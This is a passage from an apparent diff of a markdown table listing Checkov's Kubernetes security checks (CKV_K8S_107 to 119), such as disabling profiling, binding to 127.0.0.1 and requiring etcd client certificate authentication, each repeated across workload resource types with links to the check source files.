[KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3298 | CKV_K8S_107 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) 
| +| 3299 | CKV_K8S_107 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3300 | CKV_K8S_107 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3301 | CKV_K8S_107 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3302 | CKV_K8S_107 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3303 | CKV_K8S_107 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3304 | CKV_K8S_107 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3305 | CKV_K8S_107 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | 
[KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3306 | CKV_K8S_107 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) | +| 3307 | CKV_K8S_108 | resource | CronJob | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3308 | CKV_K8S_108 | resource | DaemonSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3309 | CKV_K8S_108 | resource | Deployment | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3310 | CKV_K8S_108 | resource | DeploymentConfig | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3311 | CKV_K8S_108 | resource | Job | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | 
[KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3312 | CKV_K8S_108 | resource | Pod | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3313 | CKV_K8S_108 | resource | PodTemplate | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3314 | CKV_K8S_108 | resource | ReplicaSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3315 | CKV_K8S_108 | resource | ReplicationController | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3316 | CKV_K8S_108 | resource | StatefulSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) | +| 3317 | CKV_K8S_110 | resource | CronJob | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | 
[KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3318 | CKV_K8S_110 | resource | DaemonSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3319 | CKV_K8S_110 | resource | Deployment | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3320 | CKV_K8S_110 | resource | DeploymentConfig | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3321 | CKV_K8S_110 | resource | Job | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3322 | CKV_K8S_110 | resource | Pod | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3323 | CKV_K8S_110 | resource | PodTemplate | Ensure that the 
--service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3324 | CKV_K8S_110 | resource | ReplicaSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3325 | CKV_K8S_110 | resource | ReplicationController | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3326 | CKV_K8S_110 | resource | StatefulSet | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) | +| 3327 | CKV_K8S_111 | resource | CronJob | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3328 | CKV_K8S_111 | resource | DaemonSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3329 | CKV_K8S_111 | resource | Deployment | Ensure that the --root-ca-file argument is set as 
appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3330 | CKV_K8S_111 | resource | DeploymentConfig | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3331 | CKV_K8S_111 | resource | Job | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3332 | CKV_K8S_111 | resource | Pod | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3333 | CKV_K8S_111 | resource | PodTemplate | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3334 | CKV_K8S_111 | resource | ReplicaSet | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3335 | CKV_K8S_111 | resource | ReplicationController | Ensure that the --root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3336 | CKV_K8S_111 | resource | StatefulSet | Ensure that the 
--root-ca-file argument is set as appropriate | Kubernetes | [KubeControllerManagerRootCAFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerRootCAFile.py) | +| 3337 | CKV_K8S_112 | resource | CronJob | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3338 | CKV_K8S_112 | resource | DaemonSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3339 | CKV_K8S_112 | resource | Deployment | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3340 | CKV_K8S_112 | resource | DeploymentConfig | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3341 | CKV_K8S_112 | resource | Job | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3342 | CKV_K8S_112 | resource | Pod | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3343 | 
CKV_K8S_112 | resource | PodTemplate | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3344 | CKV_K8S_112 | resource | ReplicaSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3345 | CKV_K8S_112 | resource | ReplicationController | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3346 | CKV_K8S_112 | resource | StatefulSet | Ensure that the RotateKubeletServerCertificate argument is set to true | Kubernetes | [RotateKubeletServerCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RotateKubeletServerCertificate.py) | +| 3347 | CKV_K8S_113 | resource | CronJob | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3348 | CKV_K8S_113 | resource | DaemonSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3349 | CKV_K8S_113 | resource | Deployment | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | 
[ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3350 | CKV_K8S_113 | resource | DeploymentConfig | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3351 | CKV_K8S_113 | resource | Job | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3352 | CKV_K8S_113 | resource | Pod | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3353 | CKV_K8S_113 | resource | PodTemplate | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3354 | CKV_K8S_113 | resource | ReplicaSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3355 | CKV_K8S_113 | resource | ReplicationController | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3356 | CKV_K8S_113 | resource | StatefulSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | 
[ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py) | +| 3357 | CKV_K8S_114 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3358 | CKV_K8S_114 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3359 | CKV_K8S_114 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3360 | CKV_K8S_114 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3361 | CKV_K8S_114 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3362 | CKV_K8S_114 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3363 | CKV_K8S_114 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3364 | CKV_K8S_114 | resource | ReplicaSet | Ensure that the 
--profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3365 | CKV_K8S_114 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3366 | CKV_K8S_114 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py) | +| 3367 | CKV_K8S_115 | resource | CronJob | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3368 | CKV_K8S_115 | resource | DaemonSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3369 | CKV_K8S_115 | resource | Deployment | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3370 | CKV_K8S_115 | resource | DeploymentConfig | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3371 | CKV_K8S_115 | resource | Job | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | 
[SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3372 | CKV_K8S_115 | resource | Pod | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3373 | CKV_K8S_115 | resource | PodTemplate | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3374 | CKV_K8S_115 | resource | ReplicaSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3375 | CKV_K8S_115 | resource | ReplicationController | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3376 | CKV_K8S_115 | resource | StatefulSet | Ensure that the --bind-address argument is set to 127.0.0.1 | Kubernetes | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py) | +| 3377 | CKV_K8S_116 | resource | CronJob | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3378 | CKV_K8S_116 | resource | DaemonSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | 
[EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3379 | CKV_K8S_116 | resource | Deployment | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3380 | CKV_K8S_116 | resource | DeploymentConfig | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3381 | CKV_K8S_116 | resource | Job | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3382 | CKV_K8S_116 | resource | Pod | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3383 | CKV_K8S_116 | resource | PodTemplate | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3384 | CKV_K8S_116 | resource | ReplicaSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3385 | CKV_K8S_116 | resource | ReplicationController | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | 
[EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3386 | CKV_K8S_116 | resource | StatefulSet | Ensure that the --cert-file and --key-file arguments are set as appropriate | Kubernetes | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py) | +| 3387 | CKV_K8S_117 | resource | CronJob | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3388 | CKV_K8S_117 | resource | DaemonSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3389 | CKV_K8S_117 | resource | Deployment | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3390 | CKV_K8S_117 | resource | DeploymentConfig | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3391 | CKV_K8S_117 | resource | Job | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3392 | CKV_K8S_117 | resource | Pod | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3393 | CKV_K8S_117 | resource | PodTemplate | 
Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3394 | CKV_K8S_117 | resource | ReplicaSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3395 | CKV_K8S_117 | resource | ReplicationController | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3396 | CKV_K8S_117 | resource | StatefulSet | Ensure that the --client-cert-auth argument is set to true | Kubernetes | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py) | +| 3397 | CKV_K8S_118 | resource | CronJob | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3398 | CKV_K8S_118 | resource | DaemonSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3399 | CKV_K8S_118 | resource | Deployment | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3400 | CKV_K8S_118 | resource | DeploymentConfig | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3401 | CKV_K8S_118 | 
resource | Job | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3402 | CKV_K8S_118 | resource | Pod | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3403 | CKV_K8S_118 | resource | PodTemplate | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3404 | CKV_K8S_118 | resource | ReplicaSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3405 | CKV_K8S_118 | resource | ReplicationController | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3406 | CKV_K8S_118 | resource | StatefulSet | Ensure that the --auto-tls argument is not set to true | Kubernetes | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py) | +| 3407 | CKV_K8S_119 | resource | CronJob | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate | Kubernetes | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py) | +| 3408 | CKV_K8S_119 | resource | DaemonSet | 